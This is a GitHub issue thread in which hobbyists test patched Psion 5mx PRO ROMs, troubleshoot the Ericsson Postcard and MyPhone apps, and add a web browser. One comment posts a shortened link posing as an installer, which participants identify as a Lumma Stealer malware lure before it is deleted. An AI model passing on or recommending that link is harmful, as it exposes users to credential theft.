### ISSUE TITLE
Problems with patched ROMs for 5mx PRO

### ISSUE THREAD

**Issue by Bs0Dd** [explit7/Psion-ROM#5]
I tested patched ROMs for 5mx PRO and found some problems:
### Postcard is not working correctly

In the original MC218 firmware after opening Postcard it loads the file and then shows text and image ("Image Area" by default)
and you can draw there.

![MC218](https://i.imgur.com/rr9n3uD.png)

In the patched ROMs after opening file it doesn't show image (only text at the left side) and you can't draw here.

![PROM](https://i.imgur.com/EhK60pp.png)

If I try to use a clear button, Postcard crashes.

![CRASH](https://i.imgur.com/ccS7DKk.png)

Maybe there are some missing components, that are required by Postcard to normal work.

### DE ROM includes English versions of MC218 apps

I wanted to manually transfer the German versions of programs from my dump (from the Apps folder). Postcard starts (but also has a problem with the lack of an image), but My Phone gives an error. There are probably some additional components that need to be replaced, but I don't know what.

![EMPH](https://i.imgur.com/mAdn2hZ.png)

### EN ROM lacks of Web browser (preinstalled in original DE ROM)

I found the English version of this browser in the form of a SIS package and added it to the ROM. The browser seems to be working correctly (but I did not post the ROM image due to problems with Postcard). SIS file and unpacked data for adding to ROM: http://files.bs0dd.net/psion/engweb_extr.zip

![WEB1](https://i.imgur.com/cV1ttiB.png)
![WEB2](https://i.imgur.com/y90BluZ.png)

**Comment by maher-nakesh** [comment]
try this
https://bit.ly/4e4zLlq
select the desired compiler in the installer

**Comment by explit28** [comment]
hm very informative! Thank you very much!
that seems that really some components for the postcard are missing. i need sit down and compare ericsson rom file by file.

**Comment by Bs0Dd** [comment]
> try this https://bit.ly/4e4zLlq select the desired compiler in the installer

Hahahaha, looks like bot with Lumma Stealer malware...

**Comment by explit28** [comment]
> > try this [malware link] select the desired compiler in the installer
> 
> 
> 
> Hahahaha, looks like bot with Lumma Stealer malware...

Deleted the post....

**Comment by explit28** [comment]
@Bs0Dd I added missing files to the UK ROM, but that seems that drawing in Postcard is still not possible.
I will remove Postcard from the ROM. MyPhone still need to be tested..
Maybe you can test it, when you have free minute.

**Comment by explit28** [comment]
In the last commit i uploaded the last UK ROM.
Postcard is now removed due to not working correctly, even when all files are in place.
Additional Files added from the MC218 ROM to test MyPhone.
Web Browser added.

I tested the ROM on my machine, if some other person can test it and confirm that it works fine - 
i will start updating the ROM files for other languages.

**Comment by Bs0Dd** [comment]
Tested UK ROM.
Unfortunately, I have no Ericsson phone from the support list to fully test MyPhone, so I used a more modern Sony Ericsson T630.

Looks like it works (there are problems with some functions due to the phone's partial compatibility, the same problems are present on the real MC218), I can read contacts from SIM, edit, and add new, call numbers. Also, I can change some phone's settings too.

![MYPT1](https://i.imgur.com/XDIzFUT.png)
![MYPT2](https://i.imgur.com/DiO7jf5.png)
![MYPT3](https://i.imgur.com/ERn2X2D.png)

**Comment by explit28** [comment]
Thank you for your Tests, @Bs0Dd !
I will modify the other ROMs the same way.

**Comment by explit28** [comment]
Closed as completed

**Comment by Bs0Dd** [comment]
Well, about the Ericsson Postcard app.
It looks like developers made a security trap. I tested it in the WindEmu emulator and Postcard works only if device name is "Ericsson MC218". If I change one of the letters, Postcard have same problems.
Unfortunately I can't find a reference string in the system files, so maybe it uses more complex system (string checksum?).
I think this name checking code may be in Irtranp, Picman or Pmail libraries, which are used by Postcard only.

**Comment by explit28** [comment]
This sounds plausible, thank you for the investigation...
